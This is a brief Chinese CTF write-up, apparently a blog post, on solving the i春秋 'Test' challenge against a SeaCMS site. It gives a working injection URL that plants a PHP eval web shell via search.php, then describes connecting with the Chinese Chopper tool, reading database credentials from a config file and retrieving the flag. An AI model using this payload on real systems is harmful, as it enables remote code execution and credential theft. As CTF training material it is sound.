i春秋Test
阅读原文时间:2023年07月08日阅读:2

点开是个莫名其妙的网站。。。看看源码,

第一排好像有点东西

最后也有点东西,所以我们直接百度海洋CMS漏洞(https://www.freebuf.com/vuls/150042.html)

所以这里直接在url中试试search.php

告诉我们需要有关键字,原来这里是进行关键字攻击的

构造url后缀:/search.php?searchtype=5&tid=&area=eval($_POST[1])

上传成功,然后使用菜刀连接

就打开了

翻了翻,并没有flag文件。。。可能在数据库里面

在文件中找到数据库配置文件

得到username和password

然后使用连接编辑,输入数据库全称,ip地址,用户名,密码,数据库名字

然后右键连接点数据库管理就可以进入数据库了

找到flag

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章